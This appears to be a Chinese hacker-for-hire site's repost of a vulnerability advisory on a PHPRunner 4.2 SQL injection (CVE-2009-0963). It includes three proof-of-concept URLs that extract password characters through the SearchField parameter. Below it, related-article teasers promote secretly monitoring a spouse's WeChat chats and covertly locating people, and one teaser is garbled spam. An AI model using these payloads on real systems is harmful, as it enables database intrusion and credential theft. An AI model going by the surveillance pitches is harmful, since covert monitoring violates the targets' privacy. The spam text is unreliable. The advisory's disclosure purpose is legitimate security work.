PHPRunner SearchField参数SQL注入漏洞

访客4年前关于黑客接单1096

影响版本:
XLineSoft PHPRunner 4.2
漏洞描述:
BUGTRAQ  ID: 34146
CVE(CAN) ID: CVE-2009-0963,CVE-2009-0964

PHPRunner是一款PHP网页 *** 工具,可以生成读写MySql数据库的PHP网页。

PHPRunner的orders_list.php和users_list.php模块中没有正确地验证对SearchField参数所传送的输入便在SQL查询中使用,远程攻击者可以通过提交恶意查询请求执行SQL注入攻击,完全入侵数据库系统。 <*参考 
http://secuni *** /advisories/34330/
http://marc.info/?l=bugtraq&m=123731019502458&w=2.
*>
SEBUG安全建议:
厂商补丁:

XLineSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.xlinesoft.com/.
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=Password like   \'%%\')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,1)=\'a\')-- \\
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,2)=\'ab\')--


标签: 好话题

相关文章

教你简单实现微信聊天记录监控的方法-免费接单黑客QQ

教你简单实现微信聊天记录监控的方法-免费接单黑客QQ 瑞华:全名瑞华会计师事务所,是我国第一批被授予A+ H股企业审计资格、第一批完成特殊普通合伙转制的民族品牌专业服务机构。根据公开资料显示,事务所...

Serv-U FTP服务器SMNT命令远程拒绝服务漏洞

影响版本:RhinoSoft Serv-U 7.4.0.1漏洞描述:BUGTRAQ  ID: 34127 Serv-U FTP是一款FTP服务程序。 如果远程攻击者向Serv-U FTP服务器发送特制...

干货下载_杭州小红书推广费用

我认为念完上文,您应当了解市场不景气据说已经卖完了 最近又有传闻说徐富士被雀巢公司出售徐富士首席执行官苏强否认了蓝鲸金融的传闻他说他正在领导企业从产品口味包装代言人和渠道等方面进行全面改革显然...

如何才能监控老公微信聊天记录/如何才能监控老公微信聊天记录

如何才能监控老公微信聊天记录/如何才能监控老公微信聊天记录 这两天的时间安排明显比较合理,至少自己是这样感觉:阅读的时间比以前多了不少,自己也能静下心来一页一页书慢慢地品读,这种感觉许久不见,而且看...

定位微信地址不被对方发现(黑客技术定位地址)?

黑客技术定位地址,定位微信地址对于一个技术成熟的黑客可以说是轻而易举的工作,那么究竟是怎么操作来定位别人的微信地址而不被对方所发现的呢,下面这种简单办法可以告诉你答案。 定位微信地址不被对方发现...

微信怎么定位好友位置(用微信偷看对方位置)_好友位置

微信怎么定位好友位置(用微信偷看对方位置),当今越来越多的小合资人对微信奈何定位同事的地位、微信奈何打不开的疑问感乐趣,由于当今朋友们都非常想晓得。当今朋友们都想晓得微信奈何定位同事的地位,微信奈何打...